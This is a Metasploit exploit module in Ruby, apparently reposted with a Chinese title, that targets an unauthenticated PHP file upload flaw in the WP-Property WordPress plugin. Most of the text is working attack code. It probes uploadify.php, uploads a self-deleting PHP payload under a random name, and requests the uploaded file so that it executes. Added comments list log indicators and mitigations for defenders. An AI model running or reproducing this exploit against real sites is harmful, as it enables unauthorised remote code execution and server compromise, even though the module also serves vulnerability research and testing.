WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

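# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0, per the module description).
#
# The plugin ships an uploadify.php handler under
# wp-content/plugins/wp-property/third-party/uploadify/ that accepts a
# multipart upload without authentication and stores the file where the web
# server will execute it as PHP.
#
# Notes for defenders reviewing this module:
# * Log indicators: a POST to .../third-party/uploadify/uploadify.php carrying
#   a "Filedata" part with a .php filename, followed by a GET for the path the
#   handler returned in its response body.
# * The payload is requested with :unlink_self, which by its name asks the
#   payload to delete its own file after it runs (confirm in the PhpEXE mixin),
#   so the uploaded file may be gone from disk; web server access logs are the
#   more reliable evidence.
# * Mitigation: move off the affected plugin versions (confirm the fixed
#   release with the vendor), remove or block direct access to the
#   third-party/uploadify/ directory, and deny PHP execution in any directory
#   the web server can write uploads to.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (references, targets, payload constraints) and
  # the TARGETURI option.
  #
  # @param info [Hash] metadata passed in by the framework and merged via
  #   update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the upload handler with a plain GET.
  #
  # An HTTP 200 only shows that uploadify.php is reachable; nothing here reads
  # the plugin version, so a positive result should be treated as a lead to
  # verify against the installed version rather than as confirmation.
  #
  # @return [Exploit::CheckCode::Appears] when the handler answers with 200
  # @return [Exploit::CheckCode::Unknown] on no response or any other status
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uploadify_dir}uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a PHP payload through uploadify.php and then requests the path
  # the handler reports back.
  #
  # Fails with Exploit::Failure::UnexpectedReply when the upload response is
  # missing, is not a 200, or does not mention the generated file name.
  def exploit
    peer = "#{rhost}:#{rport}"

    # Random five-letter file name, so there is no fixed name to match on;
    # the request path and the .php extension are the stable parts.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    # The "folder" field names the uploadify directory itself as the
    # destination of the upload.
    data.add_part(uploadify_dir, nil, nil, "form-data; name=\"folder\"")
    # Drop the CRLF that precedes a boundary line at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uploadify_dir}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The handler's response body is used verbatim as the path to request.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Builds the URI of the plugin's uploadify directory under TARGETURI,
  # with a trailing slash.
  #
  # @return [String]
  def uploadify_dir
    base = target_uri.path
    base += '/' if base[-1, 1] != '/'
    "#{base}wp-content/plugins/wp-property/third-party/uploadify/"
  end
end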
不要问我这写的是什么 怎么利用 我是说msf.